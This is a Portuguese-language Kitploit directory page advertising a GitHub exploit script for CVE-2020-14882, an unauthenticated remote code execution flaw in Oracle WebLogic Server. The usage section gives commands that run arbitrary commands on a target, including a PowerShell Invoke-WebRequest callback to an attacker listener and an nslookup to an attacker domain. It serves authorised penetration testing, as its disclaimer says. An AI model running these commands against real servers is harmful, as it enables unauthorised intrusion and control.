Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/danny-lli/cve-2020-14882
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

Este script permite a execução remota de código (RCE) no Oracle WebLogic Server.

Ver Repositório
21há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-14882

Este script permite a execução remota de código (RCE) no Oracle WebLogic Server usando uma requisição GET não autenticada. Ele explora a vulnerabilidade CVE-2020-14882. Ao executar comandos arbitrários, um atacante pode obter acesso não autorizado ao servidor.

Detalhes do Exploit

  • Título do Exploit: Oracle WebLogic Server, RCE não autenticado via requisição GET
  • Autor do Exploit: Danny Safaya
  • CVE: CVE-2020-14882
  • Página do Fornecedor: Oracle WebLogic Server
  • Link do Software: Oracle Middleware Downloads
  • Mais Informações: Análise do WebLogic RCE com apenas uma requisição GET (CVE-2020-14882)

Uso

Certifique-se de ter o Python 3 instalado. Para usar este script, siga os passos abaixo:

  1. Abra um terminal ou prompt de comando.

  2. Execute o script usando o seguinte comando:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    Substitua http(s)://target:7001 pela URL alvo do Oracle WebLogic Server e command pelo comando desejado a ser executado.

    Exemplo 1:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
    

    Este exemplo executa o comando nslookup your_Domain no servidor alvo.

    Exemplo 2:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
    

    Este exemplo executa o comando PowerShell Invoke-WebRequest -Uri http://your_listener no servidor alvo.

Aviso

Este script é destinado apenas para testes de penetração autorizados e fins de pesquisa em segurança. O uso não autorizado deste script para explorar sistemas sem o devido consentimento é ilegal e pode resultar em consequências legais. Use por sua conta e risco.

Dependências

Este script requer as seguintes dependências:

  • requests
  • urllib3

Por favor, certifique-se de que essas dependências estejam instaladas antes de executar o script.


Baixar ferramenta